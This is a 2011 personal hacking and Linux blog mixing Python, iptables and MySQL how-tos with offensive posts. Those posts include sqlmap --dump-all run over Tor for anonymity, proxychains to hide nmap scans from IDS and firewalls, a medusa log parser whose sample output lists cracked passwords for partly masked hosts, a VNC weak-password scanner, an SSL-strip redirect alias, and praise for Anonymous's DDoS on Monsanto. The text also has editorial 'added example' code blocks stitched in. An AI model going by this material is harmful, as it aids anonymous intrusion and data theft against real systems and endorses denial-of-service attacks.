Friday, November 4, 2011
Simple Python Portscan Function
Here's a basic portscan function written in python - http://pastebin.com/v6ntptfT
Thursday, November 3, 2011
Python Curses Example / Tutorial
I wanted to make a small example tutorial on getting started with a curses UI in python. We'll get started by creating our screen and adding a simple string;
import curses

screen = curses.initscr() # Creates our screen
curses.noecho() # Keeps the keys we press from being echoed to the screen
curses.cbreak() # Takes input right away, without waiting for Enter
screen.keypad(1) # Lets curses translate special keys (arrows, function keys)
screen.addstr(10,0,"Resist Monsanto!") # Add a string at row 10, column 0
screen.refresh() # Refresh screen now that the string has been added
# While loop to wait for key events, then quit when "q" is pressed
while 1:
    key = screen.getch() # Get the pressed key
    if key == ord("q"): break
curses.endwin() # Closes the curses environment and restores the terminal
This should result in a screen with the string "Resist Monsanto" in it. If we wanted to use colors we can create color pairs to use like so:
First we initiate the color scheme and then we will create a color pair;
curses.start_color() # Initialises color support; init_pair() fails without it
curses.init_pair(1, curses.COLOR_CYAN, curses.COLOR_BLACK) # Creates color pair 1 with foreground cyan and background black
We can now use this color pair when adding a string for example;
This would result in the following script - http://pastebin.com/0EU7UKqZ
But let's say we wanted to get user input rather than just the key event and store it in a variable. In this case we would use the screen.getstr() function. Here we'll create a simple function to get our input called command().
def command(): # Press "c" to start user input
    curses.echo() # Allows our input to be echoed to the screen
    cmd = screen.getstr(0,1,15) # Creates an "input box" at the location (0,1) with an input buffer of 15 chars
    curses.noecho() # Turns echo back off
    screen.addstr(2,0,cmd,curses.color_pair(2)) # Adds the user's input using color pair 2
This would result in the following - http://pastebin.com/zVzrGz0n
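Pulling the pieces of this tutorial together, here is an added, self-contained version (not the pastebin script above) that uses curses.wrapper() for setup and teardown, keeps the key handling in a function with no curses calls so it can be tested without a terminal, and cleans the bytes getstr() returns before drawing them. Names such as handle_key, decode_input, MAX_INPUT and the color pair numbers are choices made for this example.

```python
import curses

MAX_INPUT = 15                 # getstr() buffer size used by the tutorial
BANNER_PAIR, INPUT_PAIR = 1, 2  # color pair ids (assumption made for this example)

def handle_key(key):
    """Map a key code from getch() to an action: 'quit', 'command' or None.
    Kept free of curses calls so the loop's logic can run without a terminal."""
    if key == ord("q"):
        return "quit"
    if key == ord("c"):
        return "command"
    return None

def decode_input(raw):
    """getstr() returns bytes under Python 3; decode, trim whitespace and drop
    control characters so they never reach addstr()."""
    if isinstance(raw, bytes):
        raw = raw.decode("utf-8", errors="replace")
    return "".join(ch for ch in raw.strip() if ch.isprintable())[:MAX_INPUT]

def command(screen):
    """Echo keystrokes, read up to MAX_INPUT chars at (0, 1), then show them on row 2."""
    curses.echo()
    try:
        raw = screen.getstr(0, 1, MAX_INPUT)
    finally:
        curses.noecho()        # never leave echo on if getstr() raises
    cmd = decode_input(raw)
    screen.move(0, 0)
    screen.clrtoeol()          # clear the prompt line again
    screen.addstr(2, 0, "You typed: " + cmd, curses.color_pair(INPUT_PAIR))
    return cmd

def main(screen):
    curses.start_color()
    curses.init_pair(BANNER_PAIR, curses.COLOR_CYAN, curses.COLOR_BLACK)
    curses.init_pair(INPUT_PAIR, curses.COLOR_YELLOW, curses.COLOR_BLACK)
    screen.keypad(True)
    screen.addstr(10, 0, "Resist Monsanto!", curses.color_pair(BANNER_PAIR))
    screen.addstr(12, 0, "Press c to enter a command, q to quit")
    screen.refresh()
    while True:
        action = handle_key(screen.getch())
        if action == "quit":
            break
        if action == "command":
            command(screen)
            screen.refresh()

if __name__ == "__main__":
    # wrapper() does initscr/noecho/cbreak/keypad and always calls endwin(),
    # so the terminal is restored even if main() raises.
    curses.wrapper(main)
```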
Thursday, October 27, 2011
Python Script for Monitoring a site to see whether it's up or down
Quick script I coded to save me time checking whether a site was down; it does the checking for me and sends me an alert using "libnotify-bin" if the site happens to go down.
Two methods are available, Ping and HTTP Requests.
If I decide to add more methods, or add more sites to the HTTP request (to ensure accuracy), then I'll post an update... until then I hope you find this useful!
Monday, October 24, 2011
Python Script to Parse Files for MD5 Hashes
This script demonstrates basic usage of regular expressions in order to look for MD5s (AKA [0-9a-f]{32}) and write them to an output file.
Usage :
Python # python md5parser.py SomeFile.txt MD5list
File parsed ~ 6 hashes found.
Python # cat MD5list
aad3b435b51404eeaad3b435b51404ee
9a5760252b7455deaad3b435b51404ee
0d7f1f2bdeac6e574d6e18ca85fb58a7
9a5760252b7455deaad3b435b51404ee
0d7f1f2bdeac6e574d6e18ca85fb58a7
098f6bcd4621d373cade4e832627b4f6
Script: http://pastebin.com/PPnDs6AU
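As an added example (not the pastebin script linked above), here is the same idea with one practical caveat handled: a bare [0-9a-f]{32} also matches any 32-character slice of a longer hex digest such as a SHA-1 or SHA-256, so the pattern below refuses matches that have more hex on either side. The post's output keeps duplicates; the unique flag is an addition. Function names and the sample input are constructed for this example.

```python
import re
import sys

# The post's pattern, made case-insensitive and fenced so that a 32-hex window
# inside a longer hex run (SHA-1: 40 chars, SHA-256: 64 chars) is not reported.
MD5_RE = re.compile(r"(?<![0-9a-fA-F])[0-9a-fA-F]{32}(?![0-9a-fA-F])")

def find_md5s(text, unique=False):
    """Return MD5 candidates in order of appearance, lowercased.
    unique=True drops repeats; the original script keeps them."""
    found = [m.lower() for m in MD5_RE.findall(text)]
    if not unique:
        return found
    seen = set()
    return [h for h in found if not (h in seen or seen.add(h))]

def parse_file(in_path, out_path, unique=False):
    """Read in_path, write one hash per line to out_path, return the count."""
    with open(in_path, "r", errors="replace") as fh:
        hashes = find_md5s(fh.read(), unique)
    with open(out_path, "w") as out:
        for h in hashes:
            out.write(h + "\n")
    return len(hashes)

# Constructed sample input: two genuine MD5s (one repeated, one upper-case),
# plus a SHA-1 and a SHA-256 that the unfenced pattern would wrongly match.
SAMPLE = """\
user1:aad3b435b51404eeaad3b435b51404ee
user2:098F6BCD4621D373CADE4E832627B4F6
sha1: a94a8fe5ccb19ba61c4c0873d391e987982fbbd3
sha256: 9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08
again:aad3b435b51404eeaad3b435b51404ee
"""

if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: md5parser.py <input file> <output file>")
    count = parse_file(sys.argv[1], sys.argv[2])
    print("File parsed ~ %d hashes found." % count)
```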
Python script to parse medusa logs and check if hosts are alive
As the title says, this is a script to parse medusa logs in order to check if each host is alive; if it's been cracked then it will also display the password for the host's service that you specified when using medusa. Handy for parsing large medusa logs to see who's up.
Ex.
Checking for live hosts.
220.XX3.1XX.20 is down...
83.XXX.1X9.246 is up!
Password:r00t3d
186.X2.X5.X is down...
190.XXX.37.XX4 is up!
Password:qwerty
79.1XX.XX9.166 is down...
216.XXX.1X9.106 is up!
Password:L4M3R
89.XXX.13X.39 is down...
136.XX9.XXX.106 is down...
31.44.137.109 is down...
15X.5X.70.X is down...
189.10X.175.X74 is down...
208.124.56.2X9 is down...
129.X3.1X2.1X5 is down...
X8.4X.39.XXX is up!
Password:[SUCCESS]
XXX.114.1X0.202 is down...
X2.91.XX.1 is up!
Password:123456
...
You can find the script below;
http://pastebin.com/QUUV39KU
Python script to look up all the sites hosted on given IP/URL
Here's a script you can use to find out all the domains hosted on the given IP/URL. Takes a command line argument as you can see in the code;
Python # python sharedhosts.py www.monsanto.in
33 sites hosted on IP Address 184.22.117.180
\_________________________________________/
/
http://www.outboards.cn
http://www.sieunhandienquang.com
http://www.medhelp.in
http://www.alibre.cn
http://www.doppelstock.net
http://www.sexhuflit.com
...
I cut the list down to save space, you can find the script below;
http://pastebin.com/BzypB63Q
Monday, October 17, 2011
Python script to parse syslog/audit.log for ssh activity.
I wrote this quick script to parse through my audit log for ssh login attempts and then decided to make it usable on my ubuntu-based box too. Below you can find the source code;
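Before the linked scripts, an added example (not logmon.py or sshmon.py themselves) of parsing both log formats the post mentions: sshd lines in a syslog-style auth.log and auditd USER_AUTH records, summarised per source address. The line shapes are assumptions based on stock OpenSSH and auditd output; the sample log lines and the RFC 5737 addresses in them are constructed.

```python
import re
from collections import Counter

# Ubuntu /var/log/auth.log style (assumed format):
#   ... sshd[1234]: Failed password for invalid user admin from 203.0.113.5 port 4444 ssh2
#   ... sshd[1234]: Accepted publickey for bob from 198.51.100.7 port 5555 ssh2
SYSLOG_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\S+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port (?P<port>\d+)"
)

# auditd /var/log/audit/audit.log style (assumed format, key=value fields):
#   type=USER_AUTH msg=audit(...): ... acct="root" exe="/usr/sbin/sshd" ... addr=192.0.2.9 ... res=failed'
AUDIT_RE = re.compile(
    r'type=(?:USER_AUTH|USER_LOGIN) .*?acct="?(?P<user>[^"\s]+)"?.*?'
    r'exe="/usr/sbin/sshd".*?addr=(?P<ip>[\d.]+).*?res=(?P<result>success|failed)'
)

def parse_line(line):
    """Return {'user', 'ip', 'ok'} for an ssh authentication event, else None."""
    m = SYSLOG_RE.search(line)
    if m:
        return {"user": m.group("user"), "ip": m.group("ip"),
                "ok": m.group("result") == "Accepted"}
    m = AUDIT_RE.search(line)
    if m:
        return {"user": m.group("user"), "ip": m.group("ip"),
                "ok": m.group("result") == "success"}
    return None

def summarize(lines, threshold=3):
    """Count failures per source IP, list accepted logins, and flag any IP
    with at least `threshold` failures (a crude brute-force indicator)."""
    events = [e for e in (parse_line(l) for l in lines) if e]
    failures = Counter(e["ip"] for e in events if not e["ok"])
    accepted = [(e["user"], e["ip"]) for e in events if e["ok"]]
    suspicious = sorted(ip for ip, n in failures.items() if n >= threshold)
    return {"failures": failures, "accepted": accepted, "suspicious": suspicious}

# Constructed sample: three failures from one address, one key-based login,
# an unrelated cron line, and one auditd record for a failed ssh login.
SAMPLE_LOG = [
    "Oct 17 10:00:01 box sshd[2101]: Failed password for invalid user admin from 203.0.113.5 port 4444 ssh2",
    "Oct 17 10:00:02 box sshd[2101]: Failed password for root from 203.0.113.5 port 4445 ssh2",
    "Oct 17 10:00:03 box sshd[2102]: Failed password for root from 203.0.113.5 port 4446 ssh2",
    "Oct 17 10:00:09 box sshd[2110]: Accepted publickey for bob from 198.51.100.7 port 5555 ssh2",
    "Oct 17 10:00:10 box CRON[2111]: pam_unix(cron:session): session opened for user root",
    "type=USER_AUTH msg=audit(1318845612.101:77): pid=2120 uid=0 auid=4294967295 ses=4294967295 "
    "msg='op=PAM:authentication acct=\"root\" exe=\"/usr/sbin/sshd\" hostname=? "
    "addr=192.0.2.9 terminal=ssh res=failed'",
]

if __name__ == "__main__":
    report = summarize(SAMPLE_LOG)
    for ip, n in report["failures"].most_common():
        flag = "  <-- repeated failures" if ip in report["suspicious"] else ""
        print("%-15s %d failed login(s)%s" % (ip, n, flag))
    for user, ip in report["accepted"]:
        print("accepted: %s from %s" % (user, ip))
```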
logmon.py
sshmon.py
http://pastebin.com/ehkm5syX
Find out which linux version you're running.
Here I will show you a few ways to find out which version of linux you're running, which may come in handy when writing scripts or something of that sort.
uname -a
cat /proc/version
dmesg | grep "Linux version"
You can also find out which distribution release it is like so;
cat /etc/*-release
Saturday, October 8, 2011
Making command aliases to shorten long commands.
I haven't posted in a while, but I wanted to make a quick post on how to make an alias for long commands to reduce your typing.
For example, if I often had to perform MITM attacks during assessments/pentests then I may want to make an alias for the iptables rules. To do this I can create the following alias like so;
alias sslrule='iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000'
alias rules='echo -e "\033[1;41;1mNAT Rules";iptables -t nat -L -nv;echo -e "\033[1;44;1mPlain Rules";iptables -L -nv;echo -e "\033[0m"'
Now instead of typing out that long rule you can just type sslrule, and to see the rules in a distinctive manner I can just type rules.
Now this isn't a permanent alias; if we want to make a permanent alias then we'll need to edit our .bashrc file and add the alias there. In my case it will be located in /root/.bashrc. From there you can just append the aliases of your choice below the existing ones and you'll now have a permanent alias to save you some typing (and carpal tunnel).
Friday, September 9, 2011
Mounting a windows partition
This is a quick "how-to" on mounting a partition in GNU/Linux. First we need to identify which partition we want to mount. To do this we'll issue the fdisk command;
~ # fdisk -l
This lists the partitions; we're looking for a partition that has NTFS under the System column.
   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *           1         192     1536000   27  Unknown
/dev/sda2             192        7734    60579043+   7  HPFS/NTFS   <----
/dev/sda3           29333       30402     8586240   17  Hidden HPFS/NTFS
/dev/sda4            7734       29333   173495297    5  Extended
/dev/sda5           28962       29333     2976768   82  Linux swap / Solaris
/dev/sda6           28591       28962     2972672   82  Linux swap / Solaris
/dev/sda7           18273       18496     1798144   82  Linux swap / Solaris
/dev/sda8            7734       18273    84653056   83  Linux
Now we want to create a directory in our /media/ directory which is where we'll mount the windows partition.
mkdir -p /media/Winblows
Now we're ready to mount it in the directory we just created.
mount -t ntfs -o nls=utf8,umask=0222 /dev/sda2 /media/Winblows
That should successfully mount your windows ntfs partition in the directory we created, hope this helps!
VNC Weak Password Bash Scanner
This is an old bash script I wrote some time ago, it uses the .jar that I coded a while back to parse nmap logs for IP's. You can find the bash script at the following pastebin and the jar used to parse the nmap logs below that.
Jar - http://hakhub.blogspot.com/2011/05/bash-scripting-friendly-java-ip-parser.html
Friday, August 26, 2011
Python and Shell Commands (Popen) example
Well I've recently moved back to python after learning PHP/MySQL for a while, so as I learned I coded a small program to issue remote commands. It essentially opens a given socket and waits for a connection, when a connection is established it prompts the user for validation. If validation is successful it passes a shell (limited to /bin tools) which you can use to issue remote commands. It also adds an iptables firewall rule to accept all packets on the port you specified which it then deletes when you exit the shell. All activity is logged to Logfile.log, including failed login attempts and their IP.
Things you can learn from this script:
User Validation using hashlib and a sha512'd password
Command line arguments
Popen shell commands
Reading/Writing Files
Basic sockets
I wrote another small script to connect to the host, but in the end I decided to just use netcat instead. Example usage;
Host:
~$ python recon.py 1984
Client:
~$ nc -vv 19.84.20.11 1984
Script - http://pastebin.com/Mx600RA8
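On the "User Validation using hashlib and a sha512'd password" point, here is an added example (not the recon.py script linked above) showing that check next to a hardened form: a random per-user salt, PBKDF2 stretching, and a constant-time comparison, with the accepted/failed log line the post's script writes to Logfile.log returned to the caller. The function names, record layout and log line format are assumptions made for this example.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000   # PBKDF2 work factor; raise it as hardware allows

def plain_sha512(password):
    """What the post stores: the hex sha512 of the bare password."""
    return hashlib.sha512(password.encode()).hexdigest()

def check_plain_sha512(stored_hex, attempt):
    """The post's check. It works, but identical passwords hash identically
    (no salt), a single sha512 is cheap to brute-force offline, and == stops
    at the first differing byte, which leaks timing information."""
    return plain_sha512(attempt) == stored_hex

def make_record(password, iterations=ITERATIONS):
    """Return (salt, digest, iterations) to store instead of a bare hash.
    Two records for the same password differ because the salt is random."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, iterations)
    return salt, digest, iterations

def check_record(record, attempt, peer_ip):
    """Verify an attempt in constant time; return (ok, log_line) so the caller
    can append log_line to Logfile.log, keeping failed attempts and their IP."""
    salt, digest, iterations = record
    candidate = hashlib.pbkdf2_hmac("sha512", attempt.encode(), salt, iterations)
    ok = hmac.compare_digest(candidate, digest)
    line = "%s login attempt from %s" % ("ACCEPTED" if ok else "FAILED", peer_ip)
    return ok, line

if __name__ == "__main__":
    record = make_record("Password")
    for guess in ("Password", "password", ""):
        # 203.0.113.9 is a constructed (RFC 5737) peer address
        print(check_record(record, guess, "203.0.113.9"))
```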
Getting started with iptables
Okay so I have probably talked about iptables before, and used it in previous tutorials, but now I've decided to talk about it in particular. iptables is extremely useful and powerful if configured properly. We'll start off with a very basic rule, allowing all traffic to and from telnet.
iptables -A INPUT -p tcp --destination-port 23 -j ACCEPT
Now we should be allowing all connections on port 23 (telnet).
We can view the rules we have like so;
iptables -L
If we had wanted to list the table with numeric values instead, use the (-n) flag. In addition, we can specify what rules we want to list (INPUT, OUTPUT, etc) and increase the verbosity to see the packet and byte statistics.
iptables -L INPUT -n -v
Now, that's nice and all but I'd like to filter SSH on this laptop to drop any packets coming from IPs other than mine. In order to do this, I would issue the following command.
Now nobody but my home network can ssh into this box.
If we wanted to "flush" our chain, we can issue the following command;
iptables -F
That will have removed all the rules in the chain.
Another nice feature of iptables is the ability to redirect traffic to another port, so for example if we issued the following command then we would be redirecting the unwanted traffic from SSH to our honeypot's port.
iptables -t nat -A PREROUTING -p tcp --dport 22 ! -s 19.84.20.11 -j REDIRECT --to-port 1984
Now, nat rules are located in a separate area than your average rules. If we wanted to view these rules then we would need to explicitly specify that it's the nat rules we want to see or modify. For example, to view the rules and then flush them we would issue the following;
iptables -t nat -L -nv
iptables -t nat -F
That about wraps it up for my "how to" on getting started with iptables. Hope this helps someone else out there.
Thursday, August 18, 2011
Simple PHP Toolkit
Well I've been learning PHP/MySQL lately so while learning I decided to make something of use (well... kind of). But I've decided to move to python for my web development, so I decided to just post what I've coded so far for others to play with and learn from. It uses a MySQL DBase to login, which you can set up using the queries in my previous post on the hash cracker.
What it has;
Malware String Detector (looks through files for specific strings, which you can specify - I used it for looking through keyloggers for email credentials)
Basic Port Scanner
MD5 Hash Generator/Cracker
Below you can find the tar'd files.
PHP Scripts - http://www.mediafire.com/?g1iwudpkic5vip4
Images - http://www.mediafire.com/?7v2q2r469dn6mie
Wednesday, August 10, 2011
Windows Command Line/Console Alternative
Well I'm a linux guy, therefore I've come to love the CLI...which is unfortunately lacking on windows. I've had a stock windows starter install on this netbook I've been dual booting with and decided to play more with windows and do some malware analysis. I can't stand dealing with Microsoft's CLI, so I decided to look for an alternative... and I found exactly what I was looking for. "Console" is a Windows console window enhancement.
Console features include: multiple tabs, text editor-like text selection, different background types, alpha and color-key transparency, configurable font, different window style.
This is a very nice addition for anyone who loves the CLI, and it really helps in customizing windows to suit me which makes for a more pleasant experience.
You can find the download here, on sourceforge.
http://sourceforge.net/projects/console/
Sunday, August 7, 2011
Basic PHP Hash Cracker (Updated)
Well I've previously posted the basic hash cracker I had coded in PHP, but it seems the links had died and since I've added MySQL Database functionality I decided I would just make an updated post with both of them and their sources.
To download the original one which doesn't use a SQL DBase and works on free hosting, use this version.
The latest version stores cracked hashes and hashed words in a DBase, which it then utilizes when cracking hashes by trying all the plaintext words in the DBase against the hash. You can download that version here.
To set up the MySQL Database, open up your MySQL shell and issue the following sql queries. (If you need help getting started with setting up a web server / using the MySQL shell then check out this post)
~$ mysql -u root -p
mysql> create database HashCracker;
mysql> create table HashCracker.users(UID int not null auto_increment,User varchar(50),Pass varchar(42),primary key(UID));
mysql> create table HashCracker.Hashes(HID int not null auto_increment,String varchar(50),Hash varchar(32),primary key(HID));
mysql> insert into HashCracker.users(User,Pass) values('Username',sha1('Password'));
Now your MySQL DBase should be all set up and ready for use. Just extract the contents of the tar into your /var/www directory (or whatever your webroot directory is) and log in with the credentials you specified in the query above. If you have any comments feel free to leave them.
Friday, August 5, 2011
Monitor Turns Off After A Few Seconds (FIX)
Well I had this old flat panel radius lying around just taking up room which I thought was broken, but I had given someone an old system including an old monitor from the 90's which I decided wasn't sufficient. I had decided to pull it out and take it apart to see what exactly was wrong as it would turn on and show the desktop for a brief second and then go black. I'm not much of a hardware guy, but lately I've been playing around with things salvaged from my former job. I fixed a brand new 7-in-1 Kodak printer/everything else you can imagine, which they tossed out because they thought it was broken. I also grabbed all the flat panels they were tossing out, and this radius was one of them. After doing some reading I realized this was a good sign the capacitors are dying, and the (temporary) fix didn't require any soldering. I was able to use it by simply turning the brightness down with the few seconds I had to navigate the menu with, then once I turned the monitor on again it had enough energy to stay on, at some point I may have to replace them, but I'm sure I have something lying around I can salvage some from.
Also using a higher power supply pack made it usable regardless of brightness or contrast, but switching out the capacitor will eventually need to be done I expect.
Thursday, July 14, 2011
Find out your hardware information in linux
This is very basic, but I hadn't known about it until recently when I was given an old pc which I instantly installed linux on. I don't do much when it comes to hardware as I can't really afford to... other than other people's stuff I recycle. The quick way to find out all your hardware specs on linux is "lshw". Turns out it had a 3.00 GHz CPU with a 512mb stick of ram and 3 open slots, and I just so happen to have 3 spare 512mb sticks laying around from other pcs I've recycled. So I ended up with a fully functional 3.00GHz CPU 2GB ram linux box, which made me more than happy... as I can't afford much.
Friday, July 8, 2011
Getting started with skipfish.
Well this is another great vulnerability scanner for webapps, I really like it so far and thought it was well worth a post. So to start off, download skipfish from here. It has a great interface and outputs the results to an HTML file.
To find out more about the tool and the huge number of probes it performs, read their documentation here.
Now assuming you've downloaded the package from the link above, we will need to untar it and compile it with the make command.
~$ tar -xvzf skipfish-2.02b.tgz
~$ cd ./skipfish-2.02b
~/skipfish-2.02b $ make
Now it should have compiled, but if you get an error along the lines of this;
make: cc: Command not found
make: *** [skipfish] Error 127
Then you may need to install GCC; you will also need libidn installed.
Now assuming we have it all compiled and ready to go, you should have a file called "skipfish" in the current directory. You will have to either specify the wordlist you'd like skipfish to use or copy one from the dictionaries directory into the directory that has skipfish in it.
I'll be specifying one of the dictionaries that come with this tool.
Let's assume we're auditing this blog, we would issue the following command.
That'll get skipfish scanning; you can watch the process via the CLI and the results will be stored in the "outputdir" you specified, so you can view the results in your browser of choice.
~/skipfish-2.02b $ cd
~$ cd ./outputdir
~/outputdir $ firefox index.html
From there, you can analyze the results and perform your audit or fix your code.
Sunday, July 3, 2011
Getting started with MySQL Shell
Okay so I've just recently started getting into web dev and whatnot, but I thought I'd make a quick how-to for getting started with MySQL on the linux platform.
First off, make sure you've got a LAMP setup (Linux Apache MySQL & PHP). If you're using a debian based distro you can download them with the repositories like so;
sudo apt-get install apache2 mysql-server libapache2-mod-php5 php5-mysql
After those install, you'll want to set a password for your MySQL account (MySQL SHOULD be running, but it can be started like so; /etc/init.d/mysql start).
Now that you have your password set, you can login to MySQL and get to the fun stuff.
mysql -u root -p
You'll be prompted for your pass, after you log in you can start interacting with the DBase.
/*
Alternatively you can log in without a password, as there is none by default. Then you could set one with a query like this;
mysql -u root
mysql> SET PASSWORD FOR 'root'@'localhost' = PASSWORD('Yourpassword');
*/
If you wanted to view the existing DBases you can issue the following command;
mysql> show databases;
Now to create a DBase you can simply do this;
mysql> create database MonsantosArsenal;
Now if we wanted to move to that DBase we could do the following;
mysql> use MonsantosArsenal;
Now, what's a DBase without tables?
mysql> create table Weapons(
WepID int,
Weapon varchar(50)
);
And that'll create a table named Weapons in the Database MonsantosArsenal. You can now begin adding rows with the insert command, but first I want to point out that you can set an integer to automatically increment by 1 like this (MySQL requires the auto_increment column to be a key, hence the primary key);
mysql> create table Weapons(
WepID int not null auto_increment,
Weapon varchar(50),
primary key(WepID)
);
mysql> insert into Weapons (Weapon)
VALUES("Genetically modified food");
You now have a table with a column named "Weapon" that has the value we chose to insert. I hope this helps get you started with the mysql shell.
Anonymizing SQL Injections
So I've previously made posts about things like tor and sqlmap, but I just wanted to make this quick post to show that you can combine the two in order to increase anonymity when doing pentests or what have you. So assuming you have TOR up and running with default settings, if not you can find a how-to here, we will use sqlmap's --tor flag.
python sqlmap.py -u www.example.com/fuckmonsanto.php?prodID=23 --beep --eta --tor --dump-all
or if you're not using TOR or simply having issues, you can use the proxy flag instead. I'll be using polipo, which is utilizing tor, so I will be using my localhost and port 8123 which is the default port used by polipo. You could alternatively use a proxy off the web.
sqlmap -u www.example.com/fuckmonsanto.php?prodID=23 --beep --eta --proxy=http://127.0.0.1:8123 --dump-all
It's sadly as simple as that.
Saturday, July 2, 2011
"Linux: can't open /dev/dsp" Festival FIX
Well I've had no problems with festival on my netbook, but when I tried to use it on my desktop I got the error "Linux: can't open /dev/dsp". It seems this is due to the fact that festival uses outdated OSS emulation; to fix this problem just issue the following command;
printf ";use ALSA\n(Parameter.set 'Audio_Method 'Audio_Command)\n(Parameter.set 'Audio_Command \"aplay -q -c 1 -t raw -f s16 -r \$SR \$FILE\")\n" > .festivalrc
Now you can test to check whether it's working or not.
echo "Resist Monsanto" | festival --tts
Monday, June 27, 2011
Basic PHP Hash Cracker
Well, I've moved from Java to C++ until I got more interested in web security... which led me to stray away from C++ and learn some web dev. Right now I'm learning PHP, and in the process made this simple hash cracker. Below you can find the source and a very basic dictionary (Approx. 19mb), for testing purposes. You can check out the working version hosted here; if I make any updates to it (such as supplying a hash list instead of a single hash) then I'll update this page or make a new post.
Source
Example
Tuesday, June 21, 2011
Java MD5 parser
Well, I don't code in Java much anymore but I had encountered a task which involved isolating MD5 hashes from a rather large text file, which would have been a pain in the ass to do manually. In addition, I tried awk, grep and sed a bit. They all worked to a lesser degree, but not quite what I was looking for. So I remembered the Java IP parser I coded for parsing nmap logs and pulling the IPs, so I just altered the regex to pull MD5s instead of IPs and write them to a file. So because I found it rather helpful, I decided to make a quick post and link the new source and jar file.
I think sed could have actually done the job but I wasn't having any luck and this alternative was extremely easy and quick. Plus it does exactly what I needed.
Source - http://pastebin.com/YhS7J4bC
Usage;
Saturday, June 18, 2011
Adding fluxbox styles.
I've had a few people ask me how to change their fluxbox theme, so I've decided to make a quick how-to on adding styles, which is very easy.
First off, know that your fluxbox styles are stored in "/usr/share/fluxbox/styles"
So all you have to do is download your theme of choice and extract it into the themes folder. Now the new style should be listed in the fluxbox settings.
Compiling skipfish and fixing errors.
Well, this is the second time I'm writing this... so this one will be a bit more brief. I had encountered some issues when installing the latest version of skipfish on my desktop, one involving "idna.h" and the other a whole plethora of ssl related issues. With some googling I solved the issue, so I've decided to make a quick post to help others who want to install this tool or have encountered the same error as I had.
These two issues I had could be solved by downloading the following packages, but we will want to update first of course.
sudo apt-get update
sudo apt-get install libssl-dev && sudo apt-get install libidn11-dev
Now we will proceed on to downloading the source for those who have just come across this to compile it, or whatever the case may be.
wget http://skipfish.googlecode.com/files/skipfish-1.94b.tgz
tar -xvzf skipfish-1.94b.tgz
cd ./skipfish-1.94b
make
Now you should have successfully compiled yourself a working skipfish binary which can be used like so;
./skipfish -h
Friday, June 17, 2011
Find a file and its directory in linux
Okay this is a quick tip, which a lot of you guys probably know, but I forgot about it until just now. I always find myself in a situation where I need to find a file's location but can't seem to locate it, at which point I resort to google. But a quicker and easier way to do this is the "whereis" command.
conky: /usr/bin/conky /etc/conky /usr/lib/conky /usr/share/man/man1/conky.1.gz
Alternatively you could use the find command.
~ # find / -iname conky
/etc/conky
/usr/bin/conky
/usr/share/doc/conky
/usr/lib/conky
Monday, June 13, 2011
Anonymous nmap scans
This is an extremely simple tutorial on how you can use "proxychains" to anonymize your nmap scans, or to trip the IDS/Firewalls with multiple IPs to mask which one you really are. First, proceed to the following link to download the proxychains package.
http://prdownloads.sourceforge.net/proxychains/proxychains-3.1.tar.gz?download
Now we need to extract its contents with the "tar" command so that we can configure it and compile it.
~ $ tar -xvzf proxychains-3.1.tar.gz
That will extract it to your root directory, now we will "cd" into that directory and configure it, then compile it.
./configure
make install
Now you'll have proxychains configured for your system and have compiled a binary. Before you can use it you must configure it, unless you're using tor, which is its default setting - socks5 127.0.0.1 9050.
nano proxychains.conf
At this point you will want to scroll down to the bottom of the file, which is where you will configure which proxies and what type they are. You can find proxies at one of the following links at the bottom of this site.
For example the default should look like this;
# Examples:
#
# socks5 192.168.67.78 1080 lamer secret
# http 192.168.89.3 8080 justu hidden
# socks4 192.168.1.49 1080
# http 192.168.39.93 8080
#
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050
So, if you're using tor than you can just leave it, or add more proxies in the chain. Say I wanted to add an http proxy to the chain, I would edit the config file like so.
# Examples:
#
# socks5 192.168.67.78 1080 lamer secret
# http 192.168.89.3 8080 justu hidden
# socks4 192.168.1.49 1080
# http 192.168.39.93 8080
#
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050
http 189.47.194.196 8080
Now, you're ready to use it. You can run a tool through proxychains like this;
./proxychains nmap 199.66.1.11
And that about wraps it up for this quick how-to on anonymizing nmap scans.
Sunday, June 12, 2011
Anonymous targets Monsanto
Well, it looks like Monsanto was recently in anon's scope, being hit with a DDoS that was said to have lasted over 60 hours. There were also vulnerabilities found such as SQLi on their foreign sites, though their focus seemed to have been on DoSing monsanto.com
As I write this, their site still remains down due to the DoS anon was so nice as to supply. It seems even anon realizes monsanto is a terrible corporation whose main goal is complete control of the food supply. As Henry Kissinger once said, "If you control the oil you control the country; if you control food, you control the people."
I really hope the population wakes up and gets a grip on reality, rather than this material illusion the general public succumbs to.
I'm glad the hacking community takes notice of Monsanto and their dirty ways, rather than cracking a tin foil hat joke while stuffing their face with genetically modified chips covered in MSG and watching television.
Saturday, June 4, 2011
Notify-Send - On Screen text display
To start off, download the following package with your repositories;
apt-get install libnotify-bin
After that you can test it like so;
notify-send "Resist Monsanto"
That will create a popup on your screen displaying the text you entered.
Though that's a bit jumbled up on this netbook, so I'm going to pipe it to awk to shorten it a bit and just display what I want to see.
So now that will show me who's logged onto this system and what they're currently doing. I could have this process automated with a while loop in order to have some desired notification displayed to me every however many minutes I've chosen. For example;
That would create a pop-up every 10 seconds showing me who's logged on and what they're currently doing. If we wanted something a bit longer than a few seconds then you can add an "m" in the sleep command we issued to make it 10 minutes instead.
You can also alter the amount of time the popup is displayed by specifying a time in milliseconds that you'd like it to be displayed before expiring.
notify-send -t 5 "` w | awk '{print $1 " -> " $8}'`"
Another feature of notify-send is the ability to display icons, and a title. This is demonstrated below;
notify-send "Monsanto" "Genetically Modifying People Near YOU" -i /usr/share/pixmaps/terminator.xpm -t 5000
You may not have that icon if you don't have the terminal emulator "terminator", in which case I highly suggest giving it a try. It's by far my favorite terminal.
